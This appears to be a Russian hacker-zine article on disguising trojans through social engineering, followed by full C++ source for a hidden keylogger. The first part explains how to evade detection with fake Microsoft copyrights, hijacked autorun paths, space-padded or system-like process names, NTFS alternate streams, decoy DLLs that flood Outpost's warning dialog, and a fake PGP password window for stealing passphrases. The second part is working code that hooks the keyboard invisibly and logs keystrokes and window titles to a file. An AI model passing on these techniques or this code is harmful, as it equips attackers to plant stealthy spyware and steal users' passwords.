Back Content Forward

Итак продолжаем говорить о всяком бреде, который заслуживает внимания, но не заслуживает статьи. Сегодня в номере:

  • Социальная инижинерия в вирусах и троянах

  • простой kelogger

Что бы можно было сразу не читать, а написать что это фсё лол и настоящие пацаны такой хернёй не маются - написанно о длинных именах файлов и хуке WH_KEYBOARD_LL

Социальная инижинерия в вирусах и троянах

Сколько статей начинаются фразой по типу:

В большинстве случаев это действительно так, 99% троянов до сих пор загружаются через HKLM/Run, и для скрытности имеют названия вроде WinLoader32.exe. Глядя на это мне просто смешно становиться. Это дело нужно срочно исправлять

А теперь давайте подумаем так ли плоха ситуация ;) И насколько актуально использование социальной инжинерии в вирмекинге сегодня. Итак погнали:

Исполнияемые файлы

Почему то многие брезгуют оставлять в файлах копирайты.... нет, конечно не свои... оставляйте копирайты микрософт ;) золотое правило, которое написанно во всех учебниках по администрированию - если ты не знаешь что делает эта штука, то лучше её не трогать, на удивление работает до сих пор. Поэтому никогда не брезгуйте лишний раз подчеркнуть, что этот файл поделка © Microsoft Corporation:

Размер файла от этого значительно не увеличится - я например пересобрал только что одного троя - из 28 кб вышло 32 кб, зато значимость вашей проги в системе намного увеличится ;)

Автозагрузка

Чем пользуется большинство пользователей и администраторов для просмотра списка автозагрузки ? Ага msconfig (кто ходил на Technet посвящённый борьбе со злонамеренным кодом помнит что именно эту тулзу советовали в мс ;) В чём косяк этой чудестной программы ? А в том что это диалоговое окно - которое не поддаётся ресайзу - те размер у него фиксированный - поэтому в таблице в графе команда не всегда видна целиком команда. Как можно это использовать ?

Заменяем просто путь на свой - не изменяя названия. Многие вирусы регистрируются в автозагрузке под своим именем - что не правильно. Например найдите самую длинную строку в реестре - и измените её. Заодно путь для загрузки вируса может быть разным. В принципе для пущей маскировки можно и переписать оригинальный файл полностью своим телом, а потом подгружать оригинальный файл при запуске.

Процессы

Здесь у нас классика и два варианта:

  1. назвать свой файл типа svchost.exe или explorer.exe

  2. назвать свой файл именем с большим числом пробелов - например

    taskmgr.exe virus.exe

    Соглашусь - отображается не очень красиво - однако можно воспользоваться более хитрым подходм - если известна версия ос, куда собираемся инсталировать нашу тулзу - то можно назваться например для русской XP:

    Бездействие системы virus.exe

    Это будет отображаться уже как-то так:

    Однако всё равно остаётся троеточие и PID ессно не равен 0.

Файловая система

Сейчас уже никто не помнит какие точно файлы должны быть в директориях, сколько у него свободного места на жёстком диске. Поэтому невидимость в файлововй системе - это просто записать свои файлы куда-нить подальше в директорию винды или system32. При желании можно использовать альтернативные потоки NTFS для сохранения своих данных. При этом лучше использовать директории для сохранения своих данных.

Firewall

Тк обзор у нас короткие - остановим внимание на наиболее популярном фаере - Outpost. Какой метод для его обхода наиболее универсален ? На самом деле метод СИ =) и внедрение dll библиотеки ;) Как же так , ведь аутпост с лёгкостью отлавливает внедрение ? Однако не продуманный интерфейс позволит нам внедрить библиотеку так что бы это было максимально незаметно. Для этого надо подгрузить помимо своей библиотеки ещё штук 20-30 других библиотек. Тогда окно предупреждения будет выглядеть как-то так:

Согласитесь отловить тут нашу библиотеку скорее всего будет тяжело. Да и запарит бедного юзера просматривать столько библиотек ... особенно если в их копирайтах стоит микрософт ;)

PGP Disk

Итак теперь пришло время разобраться с прикладными программами. Для примера возьмём тулзу PGP 8-ой версии (пришлось недавно поисследовать эту прогру - вот и выбрал её в качестве подопытного кролика=) ... Так вот пусть нам надо достать пасс от этой штуки, не прибегая к кейлогерам. Окно для ввода пароля выглядит лаконично:

В случае если пароль не правильный окошко делает несколько нервных телодвижений и превращается в такое:

Ессно даже если был введён правильный пароль ничто нам не мешает подставить это окошко - так что бы подопытный представил ошибку. После повторного ввода пароля в нашу программу окно закрывает - но подопытный и не подозревает что он ввёл правильный пароль ещё в первый раз. Вообщем простой способ подмены окон для ввода пароля представляет собой эффективную штуку и по сей день...

Итого...

Кто-то скажет - да я всегда дизамлю библиотеки, да я всегда всё проверяю, да меня на такую хрень не купишь, да я ваще сижу под ликсом и мне пох, да я ещё много чего....ну что ж наши поздравления, однако помимо вас в мире есть ещё куча пользователей,в том числе корпаративных, мощности чьих компьютеров до сих пор простаивают за зря - а ведь их было бы можно использоать с большей пользой для общества =)

Итак подведём итог - чего же мы добились - и почему возникают такие проблемы. Главный косяк - непродуманный интерфейс программ. В случае msconfig и Outpost (пример с dll самый яркий - но в аутпосте полно всяких убогостей в интерфейсе, которые превращют этот солидный фаер в тулзу с ограниченными возможностями) - это диалоги, размер которых нельзя их менить - и следовательно снижается область в которую можно поместить полезную информацию. В случае стандартного файлового менеджера - ака Explorer - невозможно просмаривать альтернативные потоки NTFS (если они есть) - соответвенно не правильно отображаются размеры файлов. В случае менеджеров задач назвать интерфейс не продуманным нельзя, однако то что они отображают кучу пробелов в имени никак нельзя назвать хорошей практикой - луше бы если б пробелы просто вырезались из имён. Ну и в случае прикладых программ, в роли которых у нас выступил PGP - это то что нету сообщения на пол экрана, о том что пароль введён правильно.

Если следовать этим простым правилам - то вы в итоге получите лёгкий, быстрый, переносимый и совместимый (в том числе с будущими версиями), а главное обладающей некоторой незаметностью в системе софт. Ну и кроме того для защиты от большинства пользователей можно просто забить на эти вещи - если вы собираетесь разослать письмо с признанием в любви в виде атача.exe - то успех вам гарантированн в любом случае ;)

Простой keylogger
Прога ставит хук WH_KEYBOARD_LL и соответвенно не требует dll. Кароче обычная лабуда - может кому будет и полезно ... кто ещё не в курсе...


// klog.cpp : Defines the entry point for the application.
//

// обязательная строчка ;)

#define _WIN32_WINNT 0x0400

#include <windows.h>

#define MAX_LOADSTRING 100

// Global Variables:
HINSTANCE hInst;
TCHAR szTitle[MAX_LOADSTRING];
TCHAR szWindowClass[MAX_LOADSTRING];

// Хэндл хука
HHOOK KeyHook;

// Активное окно
HWND ActiveWnd;

//процедура для обрабоки сообщений
LRESULT CALLBACK LowLevelKeyboardProc (INT nCode, WPARAM wParam, LPARAM lParam);

// Foward declarations of functions included in this code module:
ATOM MyRegisterClass(HINSTANCE hInstance);
BOOL InitInstance(HINSTANCE, int);
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
//стандартная херня для создания окна:

MSG msg;

// Initialize global strings
wsprintf (szTitle, "MaZaFaKa.Ru Keylogger");
wsprintf (szWindowClass, "KeyLoggerWnd");

MyRegisterClass(hInstance);

// Perform application initialization:
// невидимое окно:

if(!InitInstance (hInstance, SW_HIDE))
{
return FALSE;
}

// Создаём хук
KeyHook = SetWindowsHookEx (WH_KEYBOARD_LL, LowLevelKeyboardProc, GetModuleHandle(NULL),0);

if(KeyHook == NULL){
// обшибочка вышла
return 1;
}

// Main message loop:
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}

return msg.wParam;
}


ATOM MyRegisterClass(HINSTANCE hInstance)
{
WNDCLASSEX wcex;

wcex.cbSize = sizeof(WNDCLASSEX);

wcex.style = CS_HREDRAW | CS_VREDRAW;
wcex.lpfnWndProc = (WNDPROC)WndProc;
wcex.cbClsExtra = 0;
wcex.cbWndExtra = 0;
wcex.hInstance = hInstance;
wcex.hIcon = NULL;
wcex.hCursor = LoadCursor(NULL, IDC_ARROW);
wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wcex.lpszMenuName = NULL;
wcex.lpszClassName = szWindowClass;
wcex.hIconSm = NULL;

return RegisterClassEx(&wcex);
}

BOOL InitInstance(HINSTANCE hInstance, intnCmdShow)
{
HWND hWnd;

hInst = hInstance; // Store instance handle in our global variable

hWnd = CreateWindow(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL);

if(!hWnd)
{
return FALSE;
}

ShowWindow(hWnd, nCmdShow);
UpdateWindow(hWnd);

return TRUE;
}

LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_COMMAND:
break;
case WM_DESTROY:
// перед выходом убиваем хук:
UnhookWindowsHookEx (KeyHook);

PostQuitMessage(0);
break;
default :
return DefWindowProc(hWnd, message, wParam, lParam);
}
return 0;
}


LRESULT CALLBACK LowLevelKeyboardProc (INT nCode, WPARAM wParam, LPARAM lParam){
KBDLLHOOKSTRUCT *pkbhs = (KBDLLHOOKSTRUCT *) lParam;

// файловые переменные
HANDLE hFile;
DWORD dwBytesWritten, dwPos;

// текущее окно
HWND hWndA;

char str[MAX_PATH], buf[MAX_PATH];

if(nCode == HC_ACTION && wParam == WM_KEYDOWN) {
// пишем в лог:
hFile = CreateFile ("C:\\mazalog.txt",
GENERIC_WRITE,
0,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);

if(hFile != INVALID_HANDLE_VALUE){

dwPos = SetFilePointer (hFile, 0, NULL, FILE_END);

// получаем top окно:
hWndA = GetForegroundWindow ();

if(hWndA != ActiveWnd){
//это новое окошко - надо залогить это событие
GetWindowText (hWndA, str, MAX_PATH);
ActiveWnd = hWndA;

wsprintf (buf, "\n[Window: %s]\n", str);
WriteFile (hFile, buf, strlen (buf), &dwBytesWritten, NULL);
}

// резолвим клавишу:
HKL hkl = GetKeyboardLayout(0);

UINT s = MapVirtualKeyEx(pkbhs->vkCode, 0, hkl);
GetKeyNameText (s<<16, str, MAX_PATH);

// пишем в файл
wsprintf (buf, "%s.", str);
WriteFile (hFile, buf, strlen (buf), &dwBytesWritten, NULL);

CloseHandle (hFile);
}
}

// передаём управление следующему кейлоггеру... ;)
return CallNextHookEx (KeyHook, nCode, wParam, lParam);
}

The end

BackContent Forward